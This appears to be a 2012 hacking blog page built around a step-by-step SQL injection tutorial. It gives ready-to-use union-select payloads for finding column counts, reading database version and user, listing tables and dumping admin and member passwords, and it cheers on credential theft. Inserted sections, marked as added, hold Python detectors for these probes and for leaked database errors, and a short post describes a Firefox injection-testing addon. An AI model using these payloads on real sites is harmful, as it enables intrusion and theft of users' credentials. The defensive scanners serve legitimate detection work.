Note: if you like to hack a particular website, then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
Step 2: Checking the Vulnerability:
Now we should check the vulnerability of the websites. In order to check the vulnerability, add a single quote (') at the end of the url and hit enter. (No space between the number and the single quote.)
For eg:
http://www.victimsite.com/index.php?id=2'
If the page remains the same, or shows "page not found", or shows some other web page, then it is not vulnerable. If it shows any error related to the SQL query, then it is vulnerable. Cheers..!!
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Step 3: Finding Number of columns:
Now we have found that the website is vulnerable. The next step is to find the number of columns in the table.
For that, replace the single quote (') with an "order by n" statement. (Leave one space between the number and the order by n statement.)
Change the n from 1,2,3,4,5,6,...n until you get an error like "unknown column".
For eg:
Change the number until you get the error "unknown column":
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
If you get the error while trying the "x"th number, then the number of columns is "x-1".
I mean:
http://www.victimsite.com/index.php?id=2 order by 1 (no error)
http://www.victimsite.com/index.php?id=2 order by 2 (no error)
http://www.victimsite.com/index.php?id=2 order by 3 (no error)
http://www.victimsite.com/index.php?id=2 order by 4 (no error)
http://www.victimsite.com/index.php?id=2 order by 5 (no error)
http://www.victimsite.com/index.php?id=2 order by 6 (no error)
http://www.victimsite.com/index.php?id=2 order by 7 (no error)
http://www.victimsite.com/index.php?id=2 order by 8 (error)
So now x=8, and the number of columns is x-1, i.e. 7.
Sometimes the above may not work. In that case add "--" at the end of the statement.
For eg:
http://www.victimsite.com/index.php?id=2 order by 1--
Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement, and change the id value to negative (I mean id=-2; it must be changed, but on some websites it may work without changing).
Replace columns_sequence with the numbers from 1 to x-1 (number of columns), separated with commas (,).
For eg:
If the number of columns is 7, then the query is as follows:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working, then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
It will show some numbers in the page (they must be less than the 'x' value; I mean less than or equal to the number of columns).
Like this:
Now select one number.
It is showing 3,7. Let's take the number 3.
Step 5: Finding version, database, user
Now replace the 3 in the query with "version()".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
It will show the version as 5.0.1 or 4.3, something like this.
Replace version() with database() and user() for finding the database and user respectively.
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working, then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--
Step 6: Finding the Table Name
If the version is 5 or above, then follow these steps. Now we have to find the table names of the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will show the list of table names. Find the table name which is related to the admin or user.
Now select the "admin" table.
If the version is 4 or some other, you have to guess the table names (user, tbluser). It is hard and boring to do SQL injection with version 4.
Step 7: Finding the Column Name
Now replace "group_concat(table_name)" with "group_concat(column_name)".
Replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--".
Now listen carefully: we have to convert the table name to a MySQL CHAR() string and replace mysqlchar with that.
Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()
This will open a small window; enter the table name which you found. I am going to use the admin table name.
Click ok.
Now you can see the CHAR(numbers separated with commas) in the Hack toolbar.
Copy and paste the code at the end of the url instead of the "mysqlchar".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
Now it will show the list of columns,
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
Now replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).
columnname should be replaced with one of the listed column names.
anothercolumnname should be replaced with another of the listed column names.
Now replace " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
Sometimes it will say the column is not found.
Then try other column names.
Now it will show usernames and passwords.
Enjoy..!! cheers..!!
If the website has members then jackpot for you. You will have the list of usernames and passwords.
Sometimes you may have the email ids also; enjoy, you got the duck which can produce the golden eggs.
Step 8: Finding the Admin Panel:
Just try with urls like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc. If you have luck, you will find the admin page using the above urls, or try this list.
Here is the list of admin urls:
http://www.ziddu.com/download/13163866/A...t.zip.html
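What the steps above look like from the server side, as an added example that is not part of the original post: a small Python scanner that reads web-server access-log lines and flags requests carrying the probing patterns the tutorial uses (a stray quote after a numeric id, "order by n", "union select", information_schema and group_concat, and a trailing "--" terminator). The log lines are constructed for this example and the rule names are my own; the point is that every step of the walkthrough leaves a recognisable trace in the access log, usually as a burst of requests from one address, which is exactly what probing_ips() surfaces.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format, not taken from any
# real server). 203.0.113.5 replays the tutorial's steps; the 198.51.100.9
# requests are ordinary traffic that must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2012:10:01:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Mar/2012:10:01:05 +0000] "GET /index.php?id=2' HTTP/1.1" 500 812
203.0.113.5 - - [10/Mar/2012:10:01:09 +0000] "GET /index.php?id=2%20order%20by%208-- HTTP/1.1" 500 812
203.0.113.5 - - [10/Mar/2012:10:01:14 +0000] "GET /index.php?id=-2%20and%201=2%20union%20select%201,2,version(),4,5,6,7-- HTTP/1.1" 200 4870
203.0.113.5 - - [10/Mar/2012:10:01:20 +0000] "GET /index.php?id=-2%20and%201=2%20union%20select%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 4990
198.51.100.9 - - [10/Mar/2012:10:02:00 +0000] "GET /gallery.php?id=17 HTTP/1.1" 200 6001
198.51.100.9 - - [10/Mar/2012:10:02:03 +0000] "GET /search.php?q=order%20form HTTP/1.1" 200 3200
"""

# One line of combined log format: ip, identd, user, [time], "request", status, size.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Rules are matched against the URL-decoded, lower-cased request URL. Each one
# corresponds to a step of the walkthrough above; the names are my own.
RULES = {
    "quote_after_number": re.compile(r"=\d+'"),                   # step 2: id=2'
    "order_by": re.compile(r"\border\s+by\s+\d+"),                 # step 3
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),    # step 4
    "db_function": re.compile(r"\b(version|database|user)\s*\(\s*\)"),  # step 5
    "information_schema": re.compile(r"\binformation_schema\b"),   # steps 6-7
    "group_concat": re.compile(r"\bgroup_concat\s*\("),            # steps 6-7
    "trailing_comment": re.compile(r"--\s*$"),                     # the -- terminator
}


def classify_request(url):
    """Return the names of every rule the decoded URL matches."""
    decoded = unquote_plus(url).lower()
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_log(text):
    """Parse each log line and keep the ones that trip at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        rules = classify_request(m.group("url"))
        if rules:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "url": unquote_plus(m.group("url")),
                "status": int(m.group("status")),
                "rules": rules,
            })
    return findings


def probing_ips(findings, threshold=2):
    """Addresses with at least `threshold` flagged requests: the order-by and
    union-select loops in steps 3 and 4 produce exactly this kind of burst."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["ip"], h["status"], ",".join(h["rules"]), h["url"])
    print("probing addresses:", probing_ips(hits))
```

The 500 responses to the quote and order-by requests are the server-side counterpart of the "error related to the SQL query" the tutorial looks for in step 2; an application that catches database errors and returns a generic page still leaves the request pattern in the log, which is why matching on the URL rather than the status is the more reliable signal.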
Saturday, February 4, 2012
SQL Inject me - website hacking with firefox
Firefox is a nice web browser and you can also improve its performance and usage with some available addons. If you love penetration testing or trying to hack a website, Firefox can be a hacking tool for you.
SQL Injection is a well known vulnerability of websites which can be found in most websites that use a database. The main reason for this vulnerability is that web developers always ignore some security measures, so hacking a website with SQL injection is usually easy on most websites.
SQL Inject Me is a Firefox addon which turns the Firefox web browser into a SQL injection testing tool. The tool works by submitting your HTML forms and substituting the form values with strings that are representative of a SQL injection attack.
The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.
The tool does not attempt to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.
You can think of the work done by the tool as the same as the site's QA testers manually entering all of these strings into the form fields.
Add to your firefox from here:
https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/?src=search
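The check the addon performs, looking for database error messages in the rendered HTML, written out as an added Python example. This is not the addon's code, and the signature list is my own, assembled from well-known error message formats rather than taken from SQL Inject Me. The three sample pages are constructed: one leaks the MySQL syntax error quoted in the tutorial above, one leaks an Oracle error code, and one returns the generic error page a hardened application should show, which is what makes the scan come back empty for it.

```python
import re

# Signatures of database error text that leaks into rendered HTML. Constructed
# for this example from well-known error formats; not SQL Inject Me's own list.
DB_ERROR_SIGNATURES = {
    "mysql": re.compile(
        r"You have an error in your SQL syntax|Warning: mysql_|mysqli?_fetch_(array|assoc)\(\)",
        re.I,
    ),
    "mssql": re.compile(
        r"Unclosed quotation mark after the character string|Incorrect syntax near|"
        r"Microsoft OLE DB Provider for SQL Server",
        re.I,
    ),
    "postgresql": re.compile(
        r"PostgreSQL query failed|pg_query\(\)|pg_exec\(\)|syntax error at or near", re.I
    ),
    "oracle": re.compile(r"\bORA-\d{5}\b", re.I),
    "sqlite": re.compile(r"SQLITE_ERROR|sqlite3\.OperationalError|unrecognized token", re.I),
}

# Constructed sample responses (not captured from any real site).
LEAKY_MYSQL_PAGE = """<html><body>
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' at line 1
</body></html>"""

LEAKY_ORACLE_PAGE = "<html><body><pre>ORA-01756: quoted string not properly terminated</pre></body></html>"

GENERIC_ERROR_PAGE = """<html><body>
<h1>Something went wrong</h1>
<p>The request could not be completed. Reference ID: 7f3a-21c9.</p>
</body></html>"""


def find_db_errors(html):
    """Return the sorted list of database engines whose error text appears."""
    return sorted(engine for engine, rx in DB_ERROR_SIGNATURES.items() if rx.search(html))


def check_responses(responses):
    """Map each response label to the engines it leaks; empty lists are clean."""
    return {label: find_db_errors(html) for label, html in responses.items()}


def leaky_responses(responses):
    """Labels of the responses that leak any database error text at all."""
    return sorted(label for label, engines in check_responses(responses).items() if engines)


if __name__ == "__main__":
    pages = {
        "mysql-leak": LEAKY_MYSQL_PAGE,
        "oracle-leak": LEAKY_ORACLE_PAGE,
        "hardened": GENERIC_ERROR_PAGE,
    }
    for label, engines in check_responses(pages).items():
        print(label, "->", engines or "no database error text")
```

The hardened page is what a QA tester wants to see for every form field: the detailed error belongs in the server log with a reference id, not in the response, because the leaked text is what tells a tester (or the addon) which engine is behind the form and that the input reached the query unescaped.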